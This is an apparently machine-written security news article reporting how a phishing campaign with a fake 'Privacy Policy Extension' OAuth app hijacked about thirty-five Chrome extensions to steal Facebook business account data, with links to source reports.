Ethical Hacking News
New details reveal how hackers hijacked 35 Google Chrome extensions, compromising sensitive user data and highlighting the importance of security awareness among developers and users. Stay informed about the latest cyber threats and learn how to protect yourself with our in-depth coverage.
A highly sophisticated phishing campaign targeted Chrome browser extension developers, compromising at least thirty-five extensions. The attack began with phishing emails sent to support email addresses, claiming the extension was in violation of Google's policies and requesting permission to access user data. Malicious code injected into compromised extensions stole Facebook account data, including user IDs, access tokens, and ad account information. The attack had a command and control (C2) server where stolen data was exfiltrated and used for various malicious activities. Experts warn that the actual number of affected domains may be higher than reported, with most created in November and December 2024. The attack highlights the importance of security awareness and vigilance among developers, users, and organizations.
In a shocking revelation, new details have emerged about a highly sophisticated phishing campaign that targeted Chrome browser extension developers, leading to the compromise of at least thirty-five extensions. This brazen attack, which began around December 5th, 2024, has left security experts stunned and scrambling to understand the scope and implications of this malicious operation.
According to reports on LinkedIn and Google Groups from targeted developers, the latest campaign started with a phishing email sent directly or through a support email associated with their domain name. The emails were made to appear as if they came from Google, claiming that the extension was in violation of Chrome Web Store policies and was at risk of being removed.
"We do not allow extensions with misleading, poorly formatted, non-descriptive, irrelevant, excessive, or inappropriate metadata, including but not limited to the extension description, developer name, title, icon, screenshots, and promotional images," reads one phishing email. "If you're seeing this message, it means that your extension has been flagged for review."
The phishing emails were designed to look like they came from Google's standard authorization flow, which is used to securely grant permissions to third-party apps to access specific Google account resources. However, the attackers had created a malicious OAuth application named "Privacy Policy Extension" that asked the victim to grant permission to manage Chrome Web Store extensions through their account.
The attack began with an initial report of a phishing email from supportchromestore.com, forextensions.com, and chromeforextension.com domains. However, earlier command and control subdomains were discovered in March 2024 by BleepingComputer, indicating that the threat actors had been testing this attack for months before launching their campaign.
The malicious code injected into the compromised extensions contained two files: 'worker.js' and 'content.js', which were used to steal data from Facebook accounts. The attackers targeted users of the poisoned extensions, specifically those who accessed Facebook business accounts, in an effort to gain access to sensitive information such as user IDs, access tokens, account info, ad account information, and business accounts.
The stolen information was packaged together with Facebook cookies, the user agent string, Facebook ID, and mouse click events and exfiltrated to the attacker's command and control (C2) server. The threat actors have been using this compromised data to make direct payments from the victim's credit card to their account, run disinformation or phishing campaigns on the social media platform, or monetize their access by selling it to others.
While the number of affected extensions is currently reported at thirty-five, experts warn that the actual number may be significantly higher. IOCs from the attack indicate that a far greater number of domains were targeted, with most created in November and December 2024.
In a post-mortem writeup, Cyberhaven explains how one employee followed the standard flow and inadvertently authorized the malicious third-party application without receiving an MFA prompt or having their Google credentials compromised. "The employee had Google Advanced Protection enabled and had MFA covering his account," reads the report. "The employee did not receive an MFA prompt."
This brazen attack highlights the importance of security awareness and vigilance among developers, users, and organizations. As security experts continue to analyze this sophisticated phishing campaign, they will undoubtedly uncover more details about the motivations behind it and the tactics used by the attackers.
In the meantime, it is essential for Chrome extension developers to exercise extreme caution when receiving unsolicited emails or notifications from unknown sources, even if they appear to come from Google. The consequences of falling victim to such an attack can be severe, including financial loss, reputational damage, and compromised user data.
As with any security breach, it is crucial that those affected take immediate action to contain the situation and prevent further compromise. This may involve reporting the incident to Chrome's support team or Google, as well as taking steps to secure their account credentials and protect against future attacks.
In conclusion, this highly sophisticated phishing campaign serves as a stark reminder of the ever-evolving nature of cyber threats and the need for collective vigilance in protecting our digital assets. As security experts continue to work tirelessly to understand the scope and implications of this attack, we must also remain vigilant and take proactive steps to safeguard ourselves against future threats.
Related Information:
https://www.bleepingcomputer.com/news/security/new-details-reveal-how-hackers-hijacked-35-google-chrome-extensions/
https://www.theverge.com/2024/12/28/24330758/chrome-extension-cyberhaven-hijack-phishing-cyberattack-facebook-ads-authentication-theft
https://www.tomsguide.com/computing/online-security/over-600-000-chrome-users-at-risk-after-16-browser-extensions-compromised-by-hackers-what-you-need-to-know
Published: Tue Dec 31 13:05:45 2024 by llama3.2 3B Q4_K_M
